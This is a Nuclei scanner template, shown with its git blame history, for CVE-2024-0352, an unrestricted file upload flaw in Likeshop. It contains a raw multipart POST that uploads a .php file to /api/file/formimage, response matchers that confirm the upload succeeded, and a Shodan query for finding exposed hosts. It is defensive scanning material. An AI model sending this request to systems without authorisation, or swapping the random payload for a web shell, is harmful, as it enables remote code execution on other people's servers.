nuclei-templates/http/cves/2024/CVE-2024-0352.yaml

id: CVE-2024-0352

info:
  name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
  author: CookieHanHoan,babybash,samuelsamuelsamuel
  severity: critical
  description: |
    A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
  impact: |
    The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0352
    - https://note.zhaoj.in/share/ciwYj7QXC4sZ
    - https://vuldb.com/?ctiid.250120
    - https://vuldb.com/?id.250120
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0352
    cwe-id: CWE-434
    epss-score: 0.01029
    epss-percentile: 0.82231
    cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: likeshop
    product: likeshop
    shodan-query: http.favicon.hash:874152924
  tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive
variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/file/formimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36

        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; name="file";filename="{{filename}}.php"
        Content-Type: application/x-php

        {{randstr}}
        ------WebKitFormBoundarygcflwtei--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"name\":\"{{filename}}.php\"")'
          - 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
        condition: and

    extractors:
      - type: json
        part: body
        json:
          - ".data.url"
# digest: 4a0a00473045022100be04b8cac16a0577f0fc6b0022cf4994579f8d883c303f66f39ab4955412da3f02204f210d0cd8ce3c68975bcbc6d030680d926478b27dbc1781c253f4e0835ca650:922c64590222798bb761d5b6d8e72950
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`id: CVE-2024-0352`

			`info:`
Update CVE-2024-0352.yaml 2024-01-10 13:40:00 +00:00			`name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload`
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`author: CookieHanHoan,babybash,samuelsamuelsamuel`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`severity: critical`
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`description: \|`
			`A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434`
			`impact: \|`
			`The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.`
			`remediation: Update to the latest version`
			`reference:`
Update CVE-2024-0352.yaml 2024-01-10 13:40:00 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2024-0352`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`- https://note.zhaoj.in/share/ciwYj7QXC4sZ`
			`- https://vuldb.com/?ctiid.250120`
			`- https://vuldb.com/?id.250120`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/tanjiti/sec_profile`
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`classification:`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`cve-id: CVE-2024-0352`
			`cwe-id: CWE-434`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`epss-score: 0.01029`
			`epss-percentile: 0.82231`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`cpe: cpe:2.3:a:likeshop:likeshop::::::::`
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`metadata:`
			`verified: true`
			`max-request: 1`
			`vendor: likeshop`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`product: likeshop`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`shodan-query: http.favicon.hash:874152924`
			`tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive`
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`variables:`
			`filename: "{{rand_base(6)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /api/file/formimage HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei`
			`User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36`

			`------WebKitFormBoundarygcflwtei`
			`Content-Disposition: form-data; name="file";filename="{{filename}}.php"`
			`Content-Type: application/x-php`

Update CVE-2024-0352.yaml 2024-01-10 13:40:00 +00:00			`{{randstr}}`
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`------WebKitFormBoundarygcflwtei--`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains(body, "\"name\":\"{{filename}}.php\"")'`
Update CVE-2024-0352.yaml 2024-01-10 13:40:00 +00:00			`- 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'`
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`condition: and`
Update CVE-2024-0352.yaml 2024-01-10 13:40:00 +00:00
Added CVE-2024-0352 Template 2024-01-10 10:06:24 +00:00			`extractors:`
			`- type: json`
			`part: body`
			`json:`
Update CVE-2024-0352.yaml 2024-01-10 13:40:00 +00:00			`- ".data.url"`
Auto Template Signing [Tue Jan 30 06:46:18 UTC 2024] :robot: 2024-01-30 06:46:18 +00:00			`# digest: 4a0a00473045022100be04b8cac16a0577f0fc6b0022cf4994579f8d883c303f66f39ab4955412da3f02204f210d0cd8ce3c68975bcbc6d030680d926478b27dbc1781c253f4e0835ca650:922c64590222798bb761d5b6d8e72950`